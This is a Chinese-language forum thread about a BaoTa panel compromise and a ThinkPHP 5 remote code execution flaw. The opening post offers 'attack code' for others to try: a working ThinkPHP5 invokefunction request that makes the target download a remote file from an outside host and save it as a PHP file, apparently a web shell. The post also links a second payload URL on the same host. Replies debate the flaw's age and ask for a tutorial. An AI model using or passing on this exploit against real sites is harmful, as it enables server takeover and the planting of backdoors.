来来,什么宝塔问题,给你们一段攻击代码,大家悠着玩

98次阅读

共计 881 个字符,预计需要花费 3 分钟才能阅读完成。

来来,什么宝塔问题,给你们一段攻击代码,大家悠着玩
/?s=/Index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=copy&vars%5B1%5D%5B%5D=http://tongyong888.xyz/cmd.txt&vars%5B1%5D%5B%5D=roeter.php 复制代码
请注意,注入信息,和今天说的 js 是否基本一致
http://tongyong888.xyz/dama.txt 复制代码

tp5 rce 应该跟宝塔这漏洞不沾边,拿到的只是 www 权限,部分人宝塔的 nginx 执行文件都被替换成了后门版

SuperMaster 发表于 2022-12-9 03:38
Thinkphp5 远程代码执行

Thinkphp5 新出一个高危漏洞怎么用?给个教程啊

noamwtcv 发表于 2022-12-9 03:36
怎么用?

你猜!

noamwtcv 发表于 2022-12-9 03:36
怎么用?

Thinkphp5 远程代码执行

noamwtcv 发表于 2022-12-9 03:36
怎么用?给个教程啊

话说你的电影站很吊啊。
是本地资源吗?还是通过什么口子上传的。

lovees 发表于 2022-12-9 03:41
Thinkphp5 新出一个高危漏洞

别神神秘秘的,既然发了就说明白点给 MJJ 听。

SuperMaster 发表于 2022-12-9 03:42
别神神秘秘的,既然发了就说明白点给 MJJ 听。

基本都是 python 写的 RCE 注入不想玩。。。开着防跨站攻击,PHP 禁用函数,就算 thinkphp 有漏洞也无法更改文件啊 maccms 就是 thinkphp5 又有人要遭殃了这都多老的 0day 了。而且人家也没装 TP5 这三年前的吧

lovees 发表于 2022-12-9 03:41
Thinkphp5 新出一个高危漏洞

这是新的吗,听说被修复了啊,还能用吗

noamwtcv 发表于 2022-12-9 03:36
怎么用?给个教程啊

你这影视站是什么模板啊?控制器不存在:thinkapp

正文完
 0